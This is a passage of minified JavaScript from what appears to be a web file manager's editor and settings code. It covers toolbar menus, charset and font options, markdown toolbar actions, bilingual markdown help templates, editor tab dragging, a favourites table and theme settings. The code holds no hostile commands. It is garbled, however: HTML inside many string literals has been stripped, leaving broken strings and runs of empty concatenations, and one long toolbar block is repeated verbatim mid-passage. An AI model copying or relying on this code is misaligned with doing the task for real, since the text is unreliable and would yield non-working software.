","-");r["set-font-family-"+c]={name:c,className:"set-font-family-"+d}}$.contextMenu({selector:".menu-view-setting",trigger:"none",callback:n,items:{tools:{name:LNG.tools,icon:"ellipsis-horizontal",accesskey:"m",items:{preview:{name:LNG.preview+"Ctrl+Shift+S",icon:"eye-open"},"open-browser":{name:LNG.open_ie,icon:"external-link",accesskey:"b"},sep1:"---------","beautify-html":{name:"html "+LNG.beautify_code,icon:"code"},"beautify-css":{name:"css "+LNG.beautify_code,icon:"code"},"beautify-js":{name:"js "+LNG.beautify_code,icon:"code"},"beautify-php":{name:"php "+LNG.beautify_code,icon:"code"},sep11:"---------","convert-case":{name:LNG.convert_case,icon:"font",items:{"convert-upper":{name:LNG.convert_upper_case+"Ctrl+U",icon:"chevron-sign-up"},"convert-lower":{name:LNG.convert_lower_case+"Ctrl+O",icon:"chevron-sign-down"}}},sep12:"---------","charset-set":{name:LNG.charset_default_set,icon:"flag-alt",className:"code-charset-list",accesskey:"c",items:i("set-charset")},"charset-save":{name:LNG.charset_convert_save,icon:"flag",className:"code-charset-list",accesskey:"s",items:i("save-charset")}}},sep1:"---------","function-list":{name:LNG.function_list+"Ctrl+Shift+E",className:"function-list"},"show-gutter":{name:LNG.show_gutter,className:"show-gutter"},"auto-wrap":{name:LNG.wordwrap,className:"auto-wrap"},"display-char":{name:LNG.char_all_display,className:"display-char"},sep2:"---------","font-family":{name:LNG.font_family,icon:"italic",className:"code-font-family-list",accesskey:"m",items:r},"ace-mode":{name:LNG.keyboard_type,icon:"code",accesskey:"m",items:{"keyboard-type-ace":{name:"Default",className:"keyboard-type-ace"},"keyboard-type-vim":{name:"vim",className:"keyboard-type-vim"},"keyboard-type-emacs":{name:"emacs",className:"keyboard-type-emacs"}}},sep3:"---------",help:{name:LNG.help,icon:"question",items:{shortcut:{name:LNG.shortcut,icon:"keyboard"},about:{name:LNG.about,icon:"info-sign"},emmet:{name:"Emmet help",icon:"code"},sep4:"-----------","learn-more":{name:LNG.learn_more,icon:"external-link"}}}}}),Hook.bind("rightMenu.show.menu-view-setting",function(e,t){var a=Editor.current()&&Editor.current().kod,i="contextMenu.items.tools.items.",n=t.data(),o=lodash.get(n,i+"beautify-php.$node"),s=a.charset.toUpperCase();"php"==a.mode?o.removeClass("hidden"):o.addClass("hidden"),$(".code-charset-list .selected").removeClass("selected");var r=lodash.get(n,i+"charset-set.items.set-charset-"+s+".$node"),l=lodash.get(n,i+"charset-save.items.save-charset-"+s+".$node");r&&r.addClass("selected"),l&&l.addClass("selected")}),$(".tools [action]").bind("click",function(e){var t=$(this).attr("action");return n(t),Editor.current()&&Editor.current().focus(),stopPP(e),!1}),$(".tab-size-set").click(function(){var e=$(this).text().split(":");Editor.saveConfig("tabSize",e[1]),Editor.current()&&Editor.current().focus(),Editor.current().execCommand("convertIndent","reset_size")}),$("ul.code-font-family-list .context-menu-item").click(function(){Editor.saveConfig("fontFamily",$(this).find("span").html(),""),Editor.current()&&Editor.current().focus(),o()}),$("body").click(function(e){try{$(".toolbar-menu").removeClass("select"),window.parent.$.contextMenu.hidden(),e&&$(e.target).is("textarea")||$(e.target).is("input")||0!=$(e.target).parents(".right-main").length||Editor.current()&&Editor.current().focus()}catch(e){}}),$(".gotoline-input input").keyup(function(){var e=parseInt($(this).val());isNaN(e)||Editor.current().gotoLine(e)}).keyEnter(function(e){return $.contextMenu.hidden(),Editor.current().focus(),stopPP(e),!1})},t=function(){var e=Editor.aceModeList.modes,t='
        ","class":"table"},code:{type:"inlineBlock",title:"Code
         (Ctrl-K)","class":"code",inline:{tag:"`",insert:"`${1:Code}`"},block:{tag:"\n```\n",insert:"\n```\n${1:code}\n```\n"}},math:{type:"inlineBlock",title:"Math (Ctrl-M)","class":"superscript",inline:{tag:"$$",insert:"$$${1:Math}$$"},block:{tag:"\n```\n",insert:"\n```math\n${1:}\n```\n"}}},a=function(e,t){var a=e.session.getTextRange(e.getSelectionRange()),i=t.insert;if(""!==a&&(i=i.replace(/\{1:.*\}/g,"{1:"+a+"}")),""!==a){var n=e.getSelectionRange(),o={start:{row:n.start.row,column:n.start.column-t.tag.length},end:n.start},s={start:n.end,end:{row:n.end.row,column:n.end.column+t.tag.length}};e.session.getTextRange(o)==t.tag&&e.session.getTextRange(s)==t.tag&&(e.selection.setSelectionRange({start:o.start,end:s.end}),i="${1:"+a+"}")}ace.snippetManager.insertSnippet(e,i)},i=function(e,t){for(var a=e.getSelectionRange(),i=[],n=a.end.row-a.start.row+1,o=0,s=0;n>s;s++){var r={start:{row:a.start.row+s,column:0},end:{row:a.start.row+s,column:t.insert.length}};i.push(r),e.session.getTextRange(r)==t.insert&&o++}for(var s=0;n>s;s++){var l=i[s];n==o?e.session.doc.remove(l):e.session.doc.insert({row:l.start.row,column:0},t.insert)}},n=function(e,t){var a=e.session.getTextRange(e.getSelectionRange()),i=t.insert;""!==a&&(i=i.replace(/\{1:.*\}/g,"{1:"+a+"}")),ace.snippetManager.insertSnippet(e,i)},o=function(e,t){var i=e.session.getTextRange(e.getSelectionRange()),n=e.getSelectionRange(),o=e.session.getLine(n.start.row),s={type:"inline",tag:t.inline.tag,insert:t.inline.insert,title:t.title};(n.start.row!=n.end.row||i===o.replace(/(^\s*)|(\s*$)/g,""))&&(s={type:"inline",tag:t.block.tag,insert:t.block.insert,title:t.title}),a(e,s)},s=function(){var e=["bold","italic","strikethrough","|","h1","line","quote","list_order","list_unorder","|","link","image","code","table","math"],a="";return $.each(e,function(e,i){if("|"==i)a+="|";else{var n=t[i],o="class='md-tools md-tools-"+i+" "+(n["class"]?"icon-"+n["class"]:"")+"' ";a+=""}}),a},r=function(e){var t={type:"file",title:LNG.path_api_select_image,allowExt:"png|jpg|bmp|gif|jpeg|ico|svg|tiff"};core.api.pathSelect(t,function(t){core.fileLink(t,function(a){var i=core.pathThis(t),n="!["+i+"]("+a+")";ace.snippetManager.insertSnippet(e,n)})})},l=function(s){var l=t[s],c=e();if(l&&c){switch(l.type){case"inline":a(c,l,s);break;case"head":i(c,l,s);break;case"insert":n(c,l,s);break;case"inlineBlock":o(c,l,s);break;case"image":r(c);break;default:}e().focus()}},c=function(e){e.find(".md-tools[data-action]").bind("click",function(){var e=$(this).attr("data-action");l(e)})},d=function(e){$.each(t,function(a){var i=t[a];if(i.title&&i.title.match(/\((.*)\)/)){var n=i.title.match(/\((.*)\)/)[1],o=n.replace("Ctrl","Command");e.commands.addCommand({name:a,bindKey:{win:n,mac:o},exec:function(e){"ace/mode/markdown"==e.session.$modeId&&l(a)}})}})};return{bindEvent:function(e,t){e.find(".toolbar .content").html(s()),c(e),"ace/mode/markdown"==t.session.$modeId&&d(t)},doAction:l}}),define("app/src/edit/tpl/markdownHelpCN.html",[],'
        \n
        1.标题与文字格式
        \n

        标题

        \n
        \n# 一级标题\n## 二级标题\n### 三级标题\n#### 四级标题\n##### 五级标题\n
        \n

        文字格式

        \n
        \n*斜体*\n**粗体**\n***粗斜体*** \n~~删除线~~\n
        \n

        水平线

        \n
        \n--- \n
        \n了解更多\n
        \n\n
        \n
        2.列表
        \n

        无序列表

        \n
        \n- item 1\n- item 2\n* item 3\n(可以是[减号,星号,加号]+空格)\n
        \n

        有序列表

        \n
        \n1. item 1 [数字+空格]\n2. item 2\n3. item 3\n   - child 1\n   - child 2\n
        \n
        \n\n
        \n
        3.其他
        \n

        图片

        \n
        \n![图片名称](http://图片网址)\n
        \n\n

        连接

        \n
        \n[链接名称](http://链接网址)\n<http://链接网址>\n
        \n\n

        引用

        \n
        \n> 引用\n> 折行可以不加,新起一行要加\n
        \n\n

        代码

        \n
        \n行内代码:`code`\n```\nvar msg = "多行代码";\nalert(msg);\n```\n
        \n\n

        公式

        \n
        \n行内公式 $$E=mc^2$$ ;\n\n多行公式\n$$E=mc^2$$\n\n多行公式2\n```math\nE=mc^2\n```\n
        \n编辑器\n | 公式教程\n
        \n'),define("app/src/edit/tpl/markdownHelp.html",[],'
        \n
        1.Headers and Emphasis
        \n

        Headers

        \n
        \n# Header 1\n## Header 2\n### Header 3\n#### Header 4\n##### Header 5\n
        \n

        Emphasis

        \n
        \n*Emphasis*\n**Strong**\n***Emphasis Strong*** \n~~Strikethrough~~\n
        \n

        Line

        \n
        \n--- \n
        \nLearn More\n
        \n\n
        \n
        2.Lists
        \n

        Unordered list

        \n
        \n- item 1\n- item 2\n* item 3\n(also[- ,* ,+ )\n
        \n

        Ordered list

        \n
        \n1. item 1\n2. item 2\n3. item 3\n   - child 1\n   - child 2\n
        \n
        \n\n
        \n
        3.Others
        \n

        Image

        \n
        \n![Alt text](http://img.png)\n
        \n\n

        Links

        \n
        \n[Link text](http://url)\n<http://url>\n
        \n\n

        Blockquotes

        \n
        \n> Are you \n> ok ?\n
        \n\n

        Code

        \n
        \ninline code:`code`\n```\nvar msg = "Block code";\nalert(msg);\n```\n
        \n\n

        LaTeX Math

        \n
        \ninline $$E=mc^2$$ ;\n\nblock\n$$E=mc^2$$\n\nblock2\n```math\nE=mc^2\n```\n
        \nMath Editor \n
        \n'),define("app/src/edit/tpl/editTabContent.html",[],'
        \n
        \n	\n	\n
        \n\n'),define("app/src/edit/taskTap",[],function(){var e=function(){$(".edit-tab .tab").live("mouseenter",function(){$(this).addClass("hover"),$(this).unbind("mousedown").mousedown(function(e){1!=e.which||$(this).hasClass("this")||$.nodeName(e.target,"A")||($(this).removeClass("hover").addClass("this"),Editor.select($(this).attr("uuid")))}).unbind("mouseup").mouseup(function(e){2==e.which&&Editor.remove($(this).attr("uuid"))})}).die("mouseleave").live("mouseleave",function(){$(this).removeClass("hover")}).die("dblclick").live("dblclick",function(e){stopPP(e)}),$(".edit-tab").die("dblclick").live("dblclick",function(e){Editor.add(),stopPP(e)}),$(".edit-tab .tab .close").live("click",function(){var e=$(this).parent().attr("uuid");Editor.remove(e)})},t=function(){$(".context-menu-list").filter(":visible").trigger("contextmenu:hide")},a=function(){$("body").click(t).contextmenu(t),$.contextMenu({zIndex:9999,selector:".edit-tab-menu",items:{refresh:{name:LNG.refresh+"F5",className:"refresh_tab",icon:"refresh",accesskey:"e"},sep1:"---------",close:{name:LNG.close,icon:"remove",className:"close_self",accesskey:"d"},"close-others":{name:LNG.close_others,icon:"remove",className:"close-others",accesskey:"o"},sep2:"--------","close-left":{name:LNG.close_left,icon:"remove-sign",className:"close-left",accesskey:"l"},"close-right":{name:LNG.close_right,icon:"remove-sign",className:"close-right",accesskey:"r"},sep3:"--------","open-the-path":{name:LNG.open_the_path,icon:"folder-open",className:"edit-open-the-path",accesskey:"n"},preview:{name:LNG.preview,icon:"eye-open",className:"edit_preview",accesskey:"p"}},callback:function(e,t){var a=t.$trigger,i=a.attr("uuid");switch(e){case"refresh":Editor.refresh(i);break;case"close":Editor.remove(i);break;case"close-left":var n=$(".edit-tab .tabs .tab").index(a);$(".edit-tab .tabs .tab:lt("+n+")").each(function(){Editor.remove($(this).attr("uuid"))});break;case"close-right":var n=$(".edit-tab .tabs .tab").index(a);$(".edit-tab .tabs .tab:gt("+n+")").each(function(){Editor.remove($(this).attr("uuid"))});break;case"close-others":$(".edit-tab .tabs .tab").each(function(){var e=$(this).attr("uuid");e!=i&&Editor.remove(e)});break;case"open-the-path":var o=a.attr("title");if(""==o)return Tips.tips(LNG.not_exists,"warning"),void 0;var s=core.pathFather(o),r=ShareData.frameTop();r.core.openPath(s);break;case"preview":Toolbar.doAction("preview");break;default:}}})},i=function(){var e,t,a,i,n=!1,o=!1,s=0,r=0,l=0,c=0,d=0,p=0,u=0,f=0;$(".edit-tab .tab").die("mousedown").live("mousedown",function(t){$.nodeName(t.target,"A")||(e=$.nodeName(t.target,"SPAN")?$(t.target).parent():$(this),1==t.which&&(n=!0,this.setCapture&&this.setCapture(),$(document).mousemove(function(e){m(e)}),$(document).one("mouseup",function(e){g(e),this.releaseCapture&&this.releaseCapture()})))});var h=function(i){o=!0,s=i.pageX,l=i.pageY,$tab_parent=$(".edit-tab"),t=$(".edit-tab .tab"),$(".draggable-dragging").remove(),a=e.clone().addClass("draggable-dragging").prependTo("body"),p=$sizeInt(t.css("margin-right")),u=$tab_parent.width(),f=$tab_parent.get(0).getBoundingClientRect().left,f+=$(window).scrollLeft(),r=e.get(0).getBoundingClientRect().left,d=$sizeInt(t.css("width")),c=$sizeInt(t.css("height"))-2;var n=e.get(0).getBoundingClientRect().top-$sizeInt(e.css("margin-top")),h=i.clientX-s+r;$("body").prepend("
        "),a.css({width:d+"px",top:n,left:h}),e.css("opacity",0)},m=function(i){if(n){0==o&&h(i);var u=i.clientX-s+r,f=i.clientY-l+c;a.css({left:u,top:f}),t.each(function(){var t=$(this).get(0).getBoundingClientRect().left;if(u>t&&t+d/2+p>u){if(e.attr("uuid")==$(this).attr("uuid"))return;v($(this).attr("uuid"),"left")}if(u>t-d/2+p&&t>u){if(e.attr("uuid")==$(this).attr("uuid"))return;v($(this).attr("uuid"),"right")}})}},v=function(a,n){if(!e.is(":animated")||i!=a){i=a,e.stop(!0,!0),$(".insertTemp").remove(),t=$(".edit-tab .tab");var o=e.width(),s=$(".edit-tab .tab-"+a),r=e.clone(!0).insertAfter(e).css({"margin-right":"0px",border:"none"}).addClass("insertTemp");"left"==n?e.after(s).css("width","0px"):(e.before(s).css("width","0px"),s.before(r)),e.animate({width:o+"px"},animate_time),r.animate({width:"0px"},animate_time,function(){$(this).remove(),t=$(".edit-tab .tab")})}},g=function(){if(n=!1,o=!1,startTime=0,$(".dragMaskView").remove(),Editor.current()&&Editor.current().focus(),void 0!=a){var t=e.get(0).getBoundingClientRect().left,i=e.get(0).getBoundingClientRect().top;a.animate({left:t+"px",top:i+"px"},animate_time,function(){e.css("opacity",1),$(this).remove()})}}},n=function(e,t,a){"remove"==e&&t.removeClass("edit-tab-menu");var i=1.4*animate_time,n=150,o=n,s=$(".edit-tab .tab.edit-tab-menu"),r=$sizeInt($(".edit-tab .tabs").width()),l=$sizeInt(s.css("margin-right"))+$sizeInt(s.css("border-right")),c=$sizeInt($(".edit-tab .add").css("width"))+30,d=s.length,p=Math.floor((r-c)/(n+l));switch(d>p&&(o=Math.floor((r-c)/d)-l),e){case"add":$(".edit-tab .tabs .this").css({"margin-top":"30px",width:o}).stop(1,1).animate({"margin-top":"0px"},i),s.animate({width:o+"px"},i);break;case"remove":void 0!=a&&Editor.select(a),t.stop(1,1).animate({width:"0","margin-top":"+=30"},i,function(){t.remove()}),s.stop(1,1).animate({width:o+"px"},i);break;case"resize":s.css("width",o+"px");break;default:}};return{rightMenu:{hidden:t},resetWidth:n,init:function(){e(),i(),a()}}}),define("app/src/edit/toolbar",[],function(){var e=function(){a(),$(".toolbar-menu").bind("click mouseup",stopPP),$(".toolbar-menu").on("mousedown",function(){$(".toolbar-menu").removeClass("select"),$(this).addClass("select"),$(this).contextMenu({action:e})}),window.top==window&&$('.tools [action="fullscreen"]').remove();var e=function(e,t){if(t.parent().hasClass("top-toolbar"))e.css({left:t.offset().left-4,top:t.outerHeight()-1});else if(t.parent().hasClass("bottom-toolbar")){var a=t.offset().left-e.outerWidth()+t.outerWidth()-5;e.css({left:a,top:t.offset().top-e.outerHeight()}),e.addClass("hidden"),setTimeout(function(){e.removeClass("hidden").css({top:t.offset().top-e.outerHeight()})},10)}e.find("input").length>=1&&setTimeout(function(){e.find("input").focus()},10)};$.contextMenu({selector:".menu-view-goto-line",trigger:"none",callback:n,items:{gotoline:{name:LNG.goto,className:"disable gotoline-input",type:"text"}}}),$.contextMenu({selector:".menuViewTab",trigger:"none",callback:n,items:{"soft-tab":{name:"Soft Tabs (spaces)",className:"soft-tab"},sep1:"---------","tab-size-2":{name:"Tab with:2",className:"tab-size-set tab-size-2"},"tab-size-3":{name:"Tab with:3",className:"tab-size-set tab-size-3"},"tab-size-4":{name:"Tab with:4",className:"tab-size-set tab-size-4"},"tab-size-8":{name:"Tab with:8",className:"tab-size-set tab-size-8"},sep2:"---------","convert-to-space":{name:"Convert To Space",className:"convert-to-space"},"convert-to-tab":{name:"Convert To Tabs",className:"convert-to-tab"}}});for(var t=[{charset:"UTF-8",name:LNG.charset_UTF_8},{charset:"UTF-16",name:LNG.charset_UTF_16},{charset:"BIG5-HKSCS",name:LNG.charset_BIG5_HKSCS},{charset:"BIG5",name:LNG.charset_BIG5},{charset:"CP850",name:""},{charset:"CP932",name:""},{charset:"CP949",name:LNG.charset_CP949},{charset:"CP1133",name:LNG.charset_CP1133},{charset:"CP1250",name:LNG.charset_CP1250},{charset:"CP1251",name:LNG.charset_CP1251},{charset:"CP1252",name:LNG.charset_CP1252},{charset:"CP1253",name:LNG.charset_CP1253},{charset:"CP1254",name:LNG.charset_CP1254},{charset:"CP1255",name:LNG.charset_CP1255},{charset:"CP1256",name:LNG.charset_CP1256},{charset:"CP1257",name:LNG.charset_CP1257},{charset:"CP1258",name:LNG.charset_CP1258},{charset:"EUC-JP",name:LNG.charset_EUC_JP},{charset:"EUC-KR",name:LNG.charset_EUC_KR},{charset:"GB18030",name:LNG.charset_GB18030},{charset:"GBK",name:LNG.charset_GBK},{charset:"Georgian-Academy",name:LNG.charset_Georgian_Academy},{charset:"ISO-8859-1",name:LNG.charset_ISO_8859_1},{charset:"ISO-8859-2",name:LNG.charset_ISO_8859_2},{charset:"ISO-8859-3",name:LNG.charset_ISO_8859_3},{charset:"ISO-8859-4",name:LNG.charset_ISO_8859_4},{charset:"ISO-8859-5",name:LNG.charset_ISO_8859_5},{charset:"ISO-8859-6",name:LNG.charset_ISO_8859_6},{charset:"ISO-8859-7",name:LNG.charset_ISO_8859_7},{charset:"ISO-8859-8",name:LNG.charset_ISO_8859_8},{charset:"ISO-8859-9",name:"-"},{charset:"ISO-8859-10",name:LNG.charset_ISO_8859_10},{charset:"ISO-8859-11",name:LNG.charset_ISO_8859_11},{charset:"ISO-8859-13",name:LNG.charset_ISO_8859_13},{charset:"ISO-8859-14",name:LNG.charset_ISO_8859_14},{charset:"ISO-8859-15",name:LNG.charset_ISO_8859_15},{charset:"ISO-8859-16",name:LNG.charset_ISO_8859_16},{charset:"ISO-2022-JP",name:LNG.charset_ISO_2022_JP},{charset:"KOI8-R",name:LNG.charset_KOI8_R},{charset:"KOI8-T",name:LNG.charset_KOI8_T},{charset:"KOI8-U",name:LNG.charset_KOI8_U},{charset:"Macintosh",name:LNG.charset_Macintosh},{charset:"PT154",name:LNG.charset_PT154},{charset:"SHIFT_JIS",name:LNG.charset_SHIFT_JIS},{charset:"TIS-620",name:LNG.charset_TIS_620},{charset:"ARMSCII-8",name:LNG.charset_ARMSCII_8},{charset:"VISCII",name:LNG.charset_VISCII},{charset:"Windows-1251",name:""},{charset:"Windows-1252",name:""},{charset:"Windows-1254",name:""}],i=function(e){for(var a={},i=0;t.length>i;i++){var n=t[i],o=n.name?" ("+n.name+")":"";a[e+"-"+n.charset]={name:n.charset+o}}return a},s=G.codeFontAll.split(","),r={},l=0;s.length>l;l++){var c=s[l],d=replaceAll(c," ","-");r["set-font-family-"+c]={name:c,className:"set-font-family-"+d}}$.contextMenu({selector:".menu-view-setting",trigger:"none",callback:n,items:{tools:{name:LNG.tools,icon:"ellipsis-horizontal",accesskey:"m",items:{preview:{name:LNG.preview+"Ctrl+Shift+S",icon:"eye-open"},"open-browser":{name:LNG.open_ie,icon:"external-link",accesskey:"b"},sep1:"---------","beautify-html":{name:"html "+LNG.beautify_code,icon:"code"},"beautify-css":{name:"css "+LNG.beautify_code,icon:"code"},"beautify-js":{name:"js "+LNG.beautify_code,icon:"code"},"beautify-php":{name:"php "+LNG.beautify_code,icon:"code"},sep11:"---------","convert-case":{name:LNG.convert_case,icon:"font",items:{"convert-upper":{name:LNG.convert_upper_case+"Ctrl+U",icon:"chevron-sign-up"},"convert-lower":{name:LNG.convert_lower_case+"Ctrl+O",icon:"chevron-sign-down"}}},sep12:"---------","charset-set":{name:LNG.charset_default_set,icon:"flag-alt",className:"code-charset-list",accesskey:"c",items:i("set-charset")},"charset-save":{name:LNG.charset_convert_save,icon:"flag",className:"code-charset-list",accesskey:"s",items:i("save-charset")}}},sep1:"---------","function-list":{name:LNG.function_list+"Ctrl+Shift+E",className:"function-list"},"show-gutter":{name:LNG.show_gutter,className:"show-gutter"},"auto-wrap":{name:LNG.wordwrap,className:"auto-wrap"},"display-char":{name:LNG.char_all_display,className:"display-char"},sep2:"---------","font-family":{name:LNG.font_family,icon:"italic",className:"code-font-family-list",accesskey:"m",items:r},"ace-mode":{name:LNG.keyboard_type,icon:"code",accesskey:"m",items:{"keyboard-type-ace":{name:"Default",className:"keyboard-type-ace"},"keyboard-type-vim":{name:"vim",className:"keyboard-type-vim"},"keyboard-type-emacs":{name:"emacs",className:"keyboard-type-emacs"}}},sep3:"---------",help:{name:LNG.help,icon:"question",items:{shortcut:{name:LNG.shortcut,icon:"keyboard"},about:{name:LNG.about,icon:"info-sign"},emmet:{name:"Emmet help",icon:"code"},sep4:"-----------","learn-more":{name:LNG.learn_more,icon:"external-link"}}}}}),Hook.bind("rightMenu.show.menu-view-setting",function(e,t){var a=Editor.current()&&Editor.current().kod,i="contextMenu.items.tools.items.",n=t.data(),o=lodash.get(n,i+"beautify-php.$node"),s=a.charset.toUpperCase();"php"==a.mode?o.removeClass("hidden"):o.addClass("hidden"),$(".code-charset-list .selected").removeClass("selected");var r=lodash.get(n,i+"charset-set.items.set-charset-"+s+".$node"),l=lodash.get(n,i+"charset-save.items.save-charset-"+s+".$node");r&&r.addClass("selected"),l&&l.addClass("selected")}),$(".tools [action]").bind("click",function(e){var t=$(this).attr("action");return n(t),Editor.current()&&Editor.current().focus(),stopPP(e),!1}),$(".tab-size-set").click(function(){var e=$(this).text().split(":");Editor.saveConfig("tabSize",e[1]),Editor.current()&&Editor.current().focus(),Editor.current().execCommand("convertIndent","reset_size")}),$("ul.code-font-family-list .context-menu-item").click(function(){Editor.saveConfig("fontFamily",$(this).find("span").html(),""),Editor.current()&&Editor.current().focus(),o()}),$("body").click(function(e){try{$(".toolbar-menu").removeClass("select"),window.parent.$.contextMenu.hidden(),e&&$(e.target).is("textarea")||$(e.target).is("input")||0!=$(e.target).parents(".right-main").length||Editor.current()&&Editor.current().focus()}catch(e){}}),$(".gotoline-input input").keyup(function(){var e=parseInt($(this).val());isNaN(e)||Editor.current().gotoLine(e)}).keyEnter(function(e){return $.contextMenu.hidden(),Editor.current().focus(),stopPP(e),!1})},t=function(){var e=Editor.aceModeList.modes,t='
        "+""+""+"";for(var i in e)a+=""+" "+" "+" "+"";if($("table#list").html(a),t&&"fav&"==t.substring(0,4)){var n=t.split("&")[1].split("=")[1],o=t.split("&")[2].split("=")[1],s=t.split("&")[3].split("=")[1];n=htmlEncode(urlDecode(n)),o=htmlEncode(urlDecode(o));var r=""+" "+" "+" "+"";$(r).insertAfter("table#list tr:last")}},i=function(){var e=""+"";$(e).insertAfter("table#list tr:last")},n=function(){var e=$(this).parent().parent();$(e).detach()},o=function(){var t=$(this).parent().parent(),a=$(t).find("#sname").val(),i=$(t).find("#spath").val(),n=$(t).find("#stype").val();return""==a||""==i?(Tips.tips(LNG.not_null,"error"),!1):($.ajax({url:e+"add&name="+urlEncode(a)+"&path="+urlEncode(i)+"&type="+n,dataType:"json",success:function(e){if(Tips.tips(e),e.code){$(t).attr("name",a),$(t).attr("path",i);var n=""+"";$(t).find("td.action").html(n),ShareData.frameTop("",function(e){e.ui.tree.refreshFav()})}}}),void 0)},s=function(){var a=$(this).parent().parent(),i=$(a).attr("name"),n=$(a).find("#sname").val(),o=$(a).find("#spath").val();return""==n||""==o?(Tips.tips(LNG.not_null,"error"),!1):($.ajax({dataType:"json",url:e+"edit&name="+urlEncode(i)+"&nameTo="+urlEncode(n)+"&pathTo="+urlEncode(o),success:function(e){Tips.tips(e),e.code&&($(a).attr("name",n),ShareData.frameTop("",function(e){e.ui.tree.refreshFav()}),t())}}),void 0)},r=function(){var t=$(this).parent().parent(),a=$(t).attr("name");$.ajax({url:e+"del&name="+urlEncode(a),dataType:"json",async:!1,success:function(e){Tips.tips(e),e.code&&($(t).detach(),ShareData.frameTop("",function(e){e.ui.tree.refreshFav()}))}})},l=function(){$(".fav .add").live("click",i),$(".fav .addexit").live("click",n),$(".fav .addsave").live("click",o),$(".fav .edit").live("click",s),$(".fav .del").live("click",r)};return l(),{init:t}}),define("app/src/setting/setting",[],function(e){var t,a=function(e){core.setSkin(e),ShareData.frameTop("",function(t){t.ui.setTheme(e)}),"diy"!=e?$(".theme-diy-setting").addClass("hidden"):$(".theme-diy-setting").removeClass("hidden")},i=function(e){core.setSkin(e)};template.helper("menuInfoDecode",function(e){var t=htmlEncode(urlDecode(e));return t});var n=function(t){var a={about:e("./page/about.html"),fav:e("./page/fav.html"),help:e("./page/help.html"),member:e("./page/member.html"),system:e("./page/system.html"),theme:e("./page/theme.html"),user:e("./page/user.html"),wall:e("./page/wall.html")};return a[t]},o=function(e){(""==e||void 0==e)&&(e="user"),t=e,"fav&"==e.substring(0,4)&&(e="fav"),$(".selected").removeClass("selected"),$("ul.setting a#"+e).addClass("selected");var a=window.location.href;-1!=a.indexOf("#")&&(a=a.substr(0,a.indexOf("#"))),window.location.href=a+"#"+e,$.ajax({url:G.appHost+"setting/slider&slider="+e,beforeSend:function(){$(".main").html("")},success:function(a){if("about"==e){var i=a.data;if(a.data="",!core.tools.about(i))return;a.data=i}var o=$(".menu-left .selected").clone();o.find(".ripple-father").remove();var r="
        "+o.html()+"
        ",l=n(e),c=template.compile(l),d=c({urlDecode:urlDecode,LNG:LNG,G:G,data:a.data,info:a.info});$(".main").html(r+d),$(".main").fadeIn("fast"),"fav"==e&&Fav.init(t),"member"==e&&System.init(),"theme"==e&&s(),t=e,$("a,img").attr("draggable","false")}})},s=function(){seajs.use("lib/bootstrap-slider/bootstrap-slider.css"),seajs.use("lib/colorpicker/css/colorpicker.css"),e.async("lib/bootstrap-slider/bootstrap-slider.js",function(){$(".control-slider").slider().on("slide",a)}),e.async("lib/colorpicker/js/colorpicker",function(){$(".colorpicker").remove(),$(".color-picker").ColorPicker({onBeforeShow:function(e){$(e).attr("input-name",$(this).attr("name")),$(this).ColorPickerSetColor(this.value)},onShow:function(e){return $(e).fadeIn(100),!1},onHide:function(e){return $(e).fadeOut(100),!1},onChange:function(e,t){var i=$($(this).data("colorpicker").el);i.val("#"+t),i.parent().find(".btn i").css("background",i.val()),a()}}).bind("keyup",function(){$(this).ColorPickerSetColor(this.value),$(this).parent().find(".btn i").css("background",$(this).val())}),$(".color-picker-view").click(function(){$(this).parent().find(".color-picker").click()})});var t=$(".theme-diy-setting");t.find("input[name]").unbind("change").bind("change",function(){var e=$(this).attr("name");"bgType"==e&&($(".theme-bg-type-image,.theme-bg-type-color").addClass("hidden"),$(".theme-bg-type-"+$(this).val()).removeClass("hidden")),$(this).attr("data-slider-value")||a()}),t.find(".theme-diy-save").unbind("click").bind("click",function(){var e=G.userConfig.themeDIY;$.ajax({url:G.appHost+"setting/set&k=themeDIY&v="+urlEncode(jsonEncode(e)),dataType:"json",success:function(e){Tips.tips(e)}})}),t.find(".color-list").each(function(){var e=jsonDecode($(this).attr("data-color"));$(this).css("background-image","linear-gradient("+e.colorRotate+"deg,"+e.startColor+","+e.endColor+")")}),t.find(".color-list").unbind("click").bind("click",function(){var e=jsonDecode($(this).attr("data-color"));$.each(e,function(e,i){var n=t.find("input[name="+e+"]");"colorRotate"==e?$("#colorRotate").slider("setValue",parseInt(i)):n.val(i),a()})});var a=function(){if("diy"==LocalData.get("theme")){var e={};t.find("input[name]").each(function(){var a=$(this).attr("name"),i=$(this).val();"checkbox"==$(this).attr("type")?i=Number($(this).is(":checked")):"radio"==$(this).attr("type")&&(i=t.find("[name="+a+"]:checked").val()),e[a]=i}),LocalData.setConfig("kodStyleDiy",e),core.setSkin("diy"),ShareData.frameTop("",function(e){e.ui.setTheme("diy")})}}},r=function(){1!=G.isRoot&&$("ul.setting #system").remove(),G.isRoot||core.authCheck("systemMember.get")||core.authCheck("systemGroup.get")?$("ul.setting #member").show():$("ul.setting #member").hide(),t=location.hash.split("#",2)[1],o(t),$("ul.setting a").click(function(){t!=$(this).attr("id")&&(t=$(this).attr("id"),o(t))}),$("#password-new").keyEnter(function(){Setting.tools()}),$(".setting-user-basic .form-row input").die("change").live("change",function(){var e=$(this),t=e.attr("name"),a=e.val();"checkbox"==e.attr("type")&&(a=e.prop("checked")?"1":"0"),l(t,a)}),$(".path-select").die("click").live("click",function(){core.api.pathSelect({type:"file",title:LNG.path_api_select_image,allowExt:"png|jpg|bmp|gif|jpeg|ico|svg|tiff"},function(e){var e=core.path2url(e);$(".path-select").parent().find("input[type=text]").val(e).trigger("change"),Setting.tools()})}),$(".randomImage").die("click").live("click",function(){var e=$(this),t=function(e){var t=G.myDesktop+"wallpage/";$.get(G.appHost+"explorer/mkdir&repeat_type=replace&path="+t,function(){$.get(G.appHost+"explorer/serverDownload&type=download&savePath="+t+"&url="+urlEncode(e))})};core.api.randomImage(function(a){e.addClass("moveCircle"),e.parent().find("input[type=text]").val(a).trigger("change"),1==$('.box[data-type="wall"]').length&&Setting.tools(),setTimeout(function(){e.removeClass("moveCircle")},1e3),t(a)})}),$(".box .list").live("hover",function(){$(this).addClass("listhover")},function(){$(this).toggleClass("listhover")}).live("click",function(){var e=$(this),t=e.parent();switch(type=t.attr("data-type"),value=e.attr("data-value"),t.find(".this").removeClass("this"),e.addClass("this"),type){case"wall":var i=G.staticPath+"images/wall_page/"+value+".jpg";$("#wallpage-url").val(""),ShareData.frameTop("",function(e){e.ui.setWall(i)});break;case"theme":a(value);break;default:}l(type,value)}),$(".nav a").live("click",function(){$(".nav a").removeClass("this"),$(this).addClass("this");var 